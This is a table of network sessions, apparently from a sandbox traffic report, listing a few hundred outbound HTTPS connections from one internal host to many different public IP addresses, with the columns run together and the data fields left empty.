                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23050192.168.2.235108832.133.189.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23051192.168.2.2336556120.239.173.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23052192.168.2.233333443.177.245.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23053192.168.2.2359236146.230.2.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23054192.168.2.233653442.93.228.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23055192.168.2.234143437.31.120.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23056192.168.2.2342116216.113.215.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23057192.168.2.2336290102.254.246.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23058192.168.2.2358766202.51.229.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23059192.168.2.234921087.78.180.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23060192.168.2.2339710108.249.148.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23061192.168.2.2358604136.114.206.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23062192.168.2.2343992152.151.81.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23063192.168.2.2341742116.143.49.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23064192.168.2.2354278199.161.40.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23065192.168.2.2357660198.212.193.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23066192.168.2.235582680.191.82.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23067192.168.2.2337876164.212.10.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23068192.168.2.2357252167.162.170.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23069192.168.2.2344936162.38.189.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23070192.168.2.2344784209.30.108.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23071192.168.2.23454704.255.79.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23072192.168.2.2355650149.193.138.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23073192.168.2.2334270188.169.47.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23074192.168.2.2349718172.208.164.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23075192.168.2.2345534157.134.159.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23076192.168.2.235455470.138.102.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23077192.168.2.2341446111.54.247.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23078192.168.2.2339054208.197.235.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23079192.168.2.2341958134.226.229.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23080192.168.2.235236636.173.85.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23081192.168.2.234331036.43.179.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23082192.168.2.2345628132.151.80.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23083192.168.2.235821823.35.228.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23084192.168.2.2352172218.14.48.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23085192.168.2.2333360117.20.11.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23086192.168.2.2343928142.59.182.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23087192.168.2.2354816222.127.77.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23088192.168.2.2339518177.134.118.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23089192.168.2.2336394189.137.106.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23090192.168.2.235325860.225.199.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23091192.168.2.2353026162.81.146.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23092192.168.2.2357472221.99.115.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23093192.168.2.2356242219.111.216.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23094192.168.2.235445676.96.68.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23095192.168.2.234432824.155.54.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23096192.168.2.2335282140.74.70.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23097192.168.2.233637480.242.215.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23098192.168.2.2333636171.124.184.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23099192.168.2.2334236199.50.146.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23100192.168.2.2355284201.128.3.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23101192.168.2.2346536105.73.56.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23102192.168.2.2345858107.24.112.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23103192.168.2.236038665.252.103.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23104192.168.2.23502469.100.73.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23105192.168.2.2355958146.34.221.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23106192.168.2.233980639.59.35.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23107192.168.2.2334926154.194.151.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23108192.168.2.235319464.111.220.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23109192.168.2.235244486.194.189.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23110192.168.2.2335158176.120.97.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23111192.168.2.234794640.129.49.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23112192.168.2.2353790172.15.7.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23113192.168.2.2340330147.48.17.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23114192.168.2.2347048184.205.182.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23115192.168.2.235089423.242.42.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23116192.168.2.2352552149.189.216.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23117192.168.2.2355924162.143.190.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23118192.168.2.2342108169.223.181.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23119192.168.2.233576079.140.255.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23120192.168.2.2360642210.178.198.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23121192.168.2.2359460207.250.149.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23122192.168.2.234508619.197.85.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23123192.168.2.234821639.111.11.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23124192.168.2.235332435.197.182.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23125192.168.2.2354360117.75.78.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23126192.168.2.2347120112.145.106.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23127192.168.2.2336510216.8.239.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23128192.168.2.2337190112.200.129.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23129192.168.2.2341586154.217.227.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23130192.168.2.2345876141.157.19.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23131192.168.2.2353582101.174.85.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23132192.168.2.2342408107.98.215.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23133192.168.2.2352118168.29.34.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23134192.168.2.235603054.98.180.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23135192.168.2.2348898194.48.212.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23136192.168.2.234619225.70.175.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23137192.168.2.2344512112.179.53.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23138192.168.2.2339254129.157.55.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23139192.168.2.234341072.173.196.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23140192.168.2.2345786102.10.182.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23141192.168.2.233691092.158.223.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23142192.168.2.233653486.18.121.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23143192.168.2.2345028141.169.247.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23144192.168.2.2355136152.51.46.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23145192.168.2.2343446105.167.156.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23146192.168.2.23477465.195.10.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23147192.168.2.2356908151.204.203.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23148192.168.2.2340268196.28.103.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23149192.168.2.2336362196.95.122.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23150192.168.2.234611477.245.33.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23151192.168.2.233669417.209.12.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23152192.168.2.2357660196.149.226.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23153192.168.2.2355502119.85.157.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23154192.168.2.2355662210.95.22.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23155192.168.2.234097619.82.149.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23156192.168.2.2352170111.76.141.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23157192.168.2.234456070.236.65.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23158192.168.2.2349552106.117.206.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23159192.168.2.234285480.5.13.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23160192.168.2.234909624.190.60.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23161192.168.2.2348750194.234.212.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23162192.168.2.2349592185.46.64.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23163192.168.2.2333196216.66.214.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23164192.168.2.235659293.45.54.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23165192.168.2.2352248195.41.106.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23166192.168.2.2339876201.195.166.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23167192.168.2.234884453.124.180.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23168192.168.2.2347274218.204.220.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23169192.168.2.2353032212.140.153.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23170192.168.2.233618691.155.144.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23171192.168.2.234689445.109.165.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23172192.168.2.2349448116.251.133.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23173192.168.2.2354444146.53.249.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23174192.168.2.2349330174.180.244.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23175192.168.2.2358866131.174.89.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23176192.168.2.235362678.156.183.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23177192.168.2.2351994160.249.20.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23178192.168.2.233994243.172.89.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23179192.168.2.2352114139.208.200.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23180192.168.2.23337442.218.6.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23181192.168.2.235141075.79.42.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23182192.168.2.2350790167.122.182.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23183192.168.2.233411882.235.93.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23184192.168.2.2357150121.177.15.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23185192.168.2.2352348164.214.236.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23186192.168.2.2336092197.134.179.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23187192.168.2.2344008182.170.182.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23188192.168.2.2359680113.254.48.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23189192.168.2.2358874223.246.136.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23190192.168.2.233621012.73.200.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23191192.168.2.2354984212.17.120.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192192.168.2.2357960121.179.162.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23193192.168.2.2347124201.100.56.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23194192.168.2.2357056201.143.213.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23195192.168.2.2337738199.142.226.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23196192.168.2.2348248151.235.222.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23197192.168.2.235606040.166.230.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23198192.168.2.2338866151.164.227.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23199192.168.2.2346104143.162.122.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23200192.168.2.2343928191.236.168.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23201192.168.2.2338088153.237.8.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23202192.168.2.2358404134.240.107.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23203192.168.2.2352958119.93.139.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23204192.168.2.233355261.237.248.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23205192.168.2.234093659.203.231.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23206192.168.2.234664484.18.31.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23207192.168.2.2353146165.214.57.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23208192.168.2.2352742147.78.96.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23209192.168.2.2358194142.43.108.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23210192.168.2.235289245.206.8.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23211192.168.2.2352692210.86.206.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23212192.168.2.2348318109.157.46.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23213192.168.2.2341608155.22.30.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23214192.168.2.2336318173.179.50.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23215192.168.2.2349698122.239.218.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23216192.168.2.234812631.25.18.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23217192.168.2.234013051.220.252.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23218192.168.2.2333252119.193.85.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23219192.168.2.234885469.86.190.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23220192.168.2.2360166193.65.179.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23221192.168.2.235185842.134.108.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23222192.168.2.2340900138.157.167.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23223192.168.2.2341904201.13.138.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23224192.168.2.2355156128.137.115.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23225192.168.2.235612275.126.48.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23226192.168.2.234365251.64.23.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23227192.168.2.23387965.112.5.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23228192.168.2.233782085.61.6.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23229192.168.2.234704845.142.125.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23230192.168.2.2354766133.186.211.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23231192.168.2.2343786168.215.100.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23232192.168.2.2350418222.203.36.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23233192.168.2.235742831.62.188.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23234192.168.2.2348860149.50.60.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23235192.168.2.2334526207.197.169.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23236192.168.2.2341902123.82.224.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23237192.168.2.234423237.173.102.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23238192.168.2.2357584112.59.198.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23239192.168.2.2358782147.64.59.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23240192.168.2.2353900132.44.230.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23241192.168.2.235953048.55.94.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23242192.168.2.2345752128.58.134.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23243192.168.2.2344480166.185.249.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23244192.168.2.23504641.1.34.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23245192.168.2.234326434.175.95.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23246192.168.2.234033225.78.208.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23247192.168.2.235702620.232.188.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23248192.168.2.234824671.74.11.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23249192.168.2.2349004177.244.56.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23250192.168.2.2343894134.248.103.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23251192.168.2.2348176207.41.115.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23252192.168.2.2340456143.79.236.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23253192.168.2.2350880207.172.156.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23254192.168.2.234528697.209.177.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23255192.168.2.2339364168.39.207.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23256192.168.2.2353136166.243.113.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23257192.168.2.2349834201.129.2.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23258192.168.2.235816653.148.179.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23259192.168.2.233675258.154.12.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23260192.168.2.2354414204.127.33.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23261192.168.2.2341998130.84.241.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23262192.168.2.2351572141.37.180.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23263192.168.2.2353812157.143.3.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23264192.168.2.2351308218.51.242.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23265192.168.2.2355828111.108.55.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23266192.168.2.234817873.45.9.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23267192.168.2.2335878206.216.73.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23268192.168.2.234486819.61.151.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23269192.168.2.233871483.58.181.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23270192.168.2.2346244153.2.43.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
